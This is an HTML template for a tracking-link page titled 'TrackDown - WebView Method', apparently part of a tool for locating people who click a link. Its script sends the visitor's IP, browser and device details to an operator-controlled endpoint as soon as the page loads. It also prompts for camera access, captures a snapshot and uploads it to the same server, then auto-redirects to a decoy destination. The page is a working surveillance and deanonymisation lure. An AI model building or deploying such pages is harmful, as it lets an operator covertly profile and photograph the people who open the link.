<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TrackDown - WebView Method</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background: linear-gradient(135deg, #11998e 0%, #38ef7d 100%);
            margin: 0;
            padding: 20px;
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .container {
            background: white;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 10px 30px rgba(0,0,0,0.2);
            text-align: center;
            max-width: 500px;
        }
        .title { color: #333; margin-bottom: 20px; }
        .info { background: #f5f5f5; padding: 15px; border-radius: 5px; margin: 20px 0; }
        .camera-section {
            background: #e8f5e8;
            padding: 20px;
            border-radius: 5px;
            margin: 20px 0;
        }
        .redirect-btn, .camera-btn {
            background: #11998e;
            color: white;
            border: none;
            padding: 12px 30px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            margin: 10px;
        }
        .redirect-btn:hover, .camera-btn:hover { background: #0d7f72; }
        #cameraStatus { margin: 10px 0; }
    </style>
</head>
<body>
    <div class="container">
        <h1 class="title">📱 WebView Tracking Method</h1>
        <div class="info">
            <p><strong>Your IP:</strong> {{ip}}</p>
            <p><strong>Time:</strong> {{time}}</p>
            <p><strong>Tracking ID:</strong> {{uid}}</p>
        </div>
        
        <div class="camera-section">
            <h3>📸 Camera Access (Optional)</h3>
            <p>Allow camera access for enhanced tracking</p>
            <button class="camera-btn" onclick="requestCamera()">Enable Camera</button>
            <div id="cameraStatus"></div>
        </div>
        
        <p>You will be redirected to your destination shortly...</p>
        <button class="redirect-btn" onclick="redirect()">Continue to Website</button>
    </div>

    <script>
        const trackingData = {
            trackingId: '{{uid}}',
            ipAddress: '{{ip}}',
            userAgent: navigator.userAgent,
            deviceInfo: {
                screen: screen.width + 'x' + screen.height,
                timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
                language: navigator.language
            },
            location: null,
            browserInfo: {
                name: navigator.appName,
                version: navigator.appVersion,
                platform: navigator.platform
            }
        };

        // Track the visit
        fetch('{{a}}/api/track/visit', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify(trackingData)
        }).catch(console.error);

        async function requestCamera() {
            const status = document.getElementById('cameraStatus');
            try {
                status.textContent = 'Requesting camera access...';
                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                
                const video = document.createElement('video');
                video.srcObject = stream;
                video.play();
                
                video.addEventListener('loadedmetadata', () => {
                    const canvas = document.createElement('canvas');
                    canvas.width = video.videoWidth;
                    canvas.height = video.videoHeight;
                    canvas.getContext('2d').drawImage(video, 0, 0);
                    
                    const imageData = canvas.toDataURL('image/jpeg');
                    
                    // Send snapshot to server
                    fetch('{{a}}/api/track/snapshot', {
                        method: 'POST',
                        headers: { 'Content-Type': 'application/json' },
                        body: JSON.stringify({
                            trackingId: '{{uid}}',
                            imageData: imageData,
                            deviceInfo: trackingData.deviceInfo
                        })
                    }).catch(console.error);
                    
                    stream.getTracks().forEach(track => track.stop());
                    status.textContent = '✅ Camera snapshot captured!';
                });
            } catch (error) {
                status.textContent = '❌ Camera access denied or not available';
                console.error('Camera error:', error);
            }
        }

        function redirect() {
            window.location.href = '{{url}}';
        }

        // Auto redirect after 5 seconds (more time for camera)
        setTimeout(redirect, 5000);
    </script>
</body>
</html>